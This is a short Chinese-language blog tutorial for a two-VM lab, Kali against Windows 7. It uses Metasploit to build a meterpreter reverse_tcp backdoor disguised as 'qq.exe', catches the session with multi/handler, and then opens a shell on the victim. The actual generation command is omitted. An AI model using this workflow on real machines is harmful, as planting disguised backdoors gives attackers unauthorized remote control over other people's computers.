kali  x64:192.168.26.136
win7  x86: 192.168.26.128


先在kali终端输入msfvenom -l,打开payload目录

利用msf生成后门拿shell

然后找到payload windows/meterpreter/reverse_tcp

输入以下命令生成后门qq.exe

利用msf生成后门拿shell

然后将生成的qq.exe移到win7然后打开msfconsole

使用该攻击模块监听 use exploit/multi/handler

 然后设置payload

利用msf生成后门拿shell

show options 查看选项

设置LHOSTkali地址

利用msf生成后门拿shell

然后run开始监听

利用msf生成后门拿shell

这时我们打开win7qq.exe文件

就能看到Kali这边获取到一个Session

利用msf生成后门拿shell

输入jobs退出继续输入sessions -l查看session列表

利用msf生成后门拿shell

这里有一个session列表,sessionid1

我们输入sessions -i 1,与该session交互

利用msf生成后门拿shell

输入getuid查看用户信息

利用msf生成后门拿shell

输入systinfo获取系统信息

利用msf生成后门拿shell

输入shell即可获取win7shell

利用msf生成后门拿shell

不过用这样方式拿的shell普遍都是很低的,还需提权


相关文章:

  • 2021-07-23
  • 2021-08-24
  • 2021-06-28
  • 2022-12-23
  • 2021-10-18
  • 2022-01-15
  • 2021-07-30
猜你喜欢
  • 2022-12-23
  • 2021-11-19
  • 2021-12-01
  • 2022-12-23
  • 2021-10-31
  • 2022-01-12
  • 2022-02-05
相关资源
相似解决方案